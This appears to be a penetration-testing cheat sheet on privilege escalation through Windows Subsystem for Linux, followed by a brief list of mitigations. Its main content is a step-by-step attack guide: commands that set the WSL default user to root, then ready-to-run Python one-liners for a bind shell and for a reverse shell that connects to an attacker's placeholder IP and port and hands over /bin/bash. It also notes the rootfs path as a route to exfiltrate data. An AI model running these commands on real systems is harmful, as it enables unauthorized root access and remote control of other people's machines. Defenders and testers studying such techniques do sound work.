# EoP - Windows Subsystem for Linux (WSL) ### Key Exploitation Points 1. **Default User Configuration**:\ WSL allows setting the default user to `root`, granting administrative privileges. 2. **Network Access**:\ Root access enables opening any port, facilitating bind or reverse shells. 3. **Filesystem Access**:\ WSL’s filesystem integration allows exploration and potential data exfiltration. *** ### Step-by-Step Exploitation Guide #### **1. Verifying WSL Installation** Confirm WSL is installed and configured: ```cmd wsl --list --verbose ``` This will list installed distributions and their states. *** #### **2. Changing the Default User to Root** Gain `root` privileges by changing the default user: ```cmd C:\path\to\your\distribution.exe config --default-user root ``` **Example for Ubuntu:** ```cmd C:\Ubuntu.exe config --default-user root ``` *** #### **3. Verifying Root Access** After setting the default user to `root`, confirm by running: ```cmd wsl whoami ``` **Output:** Should return `root`. *** #### **4. Establishing a Bind or Reverse Shell** Once you have `root` access, use Python to establish a shell: **Bind Shell** Opens a port for incoming connections: ```bash wsl python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0", PORT));s.listen(1);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);pty.spawn("/bin/bash")' ``` Replace `PORT` with the desired listening port. *** **Reverse Shell** Connects back to an external listener: ```bash wsl python -c 'import socket,os,pty;s=socket.socket();s.connect(("YOUR_IP", YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' ``` Replace `YOUR_IP` and `YOUR_PORT` with the attacker's IP and port. *** #### **5. Accessing the WSL Filesystem** The WSL filesystem can be explored directly from Windows: ```plaintext C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\ ``` This location contains the root filesystem of the WSL environment. *** #### **6. Alternative Access via `bash.exe`** Access WSL through `bash.exe`: ```plaintext C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe ``` Run `bash.exe` to enter the WSL environment directly. *** ### Mitigation Strategies To secure systems against unauthorized WSL exploitation: #### **1. Limit WSL Use** Restrict access to WSL, especially for non-administrative users on sensitive systems. *** #### **2. Configure User Permissions** Ensure the default user cannot be set to `root` without administrative approval. *** #### **3. Network Security** Monitor and restrict ports opened by WSL to prevent unauthorized bind or reverse shells. *** #### **4. Audit WSL Activity** Regularly review WSL configurations and logs for signs of unauthorized changes or suspicious activity. *** #### **5. Keep Systems Updated** Ensure both Windows and WSL are up-to-date with the latest security patches. *** ### References * [**Microsoft WSL Documentation**](https://learn.microsoft.com/en-us/windows/wsl/) * [**Sysinternals Tools**](https://learn.microsoft.com/en-us/sysinternals/) * [**OWASP Top 10 Security Risks**](https://owasp.org/www-project-top-ten/)